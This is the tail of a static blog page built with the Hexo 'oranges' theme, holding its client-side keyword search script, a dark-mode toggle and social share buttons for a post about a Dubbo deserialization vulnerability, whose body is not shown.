            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + Dubbo%E3%83%87%E3%82%B7%E3%83%AA%E3%82%A2%E3%83%A9%E3%82%A4%E3%82%BC%E3%83%BC%E3%82%B7%E3%83%A7%E3%83%B3%E8%84%86%E5%BC%B1%E6%80%A7%E5%88%86%E6%9E%90 + '&url=' + http%3A%2F%2Fexample.com%2F2022%2F09%2F11%2Fbin%2Fjava%2FDubbo%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/2022/09/11/bin/java/Dubbo/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
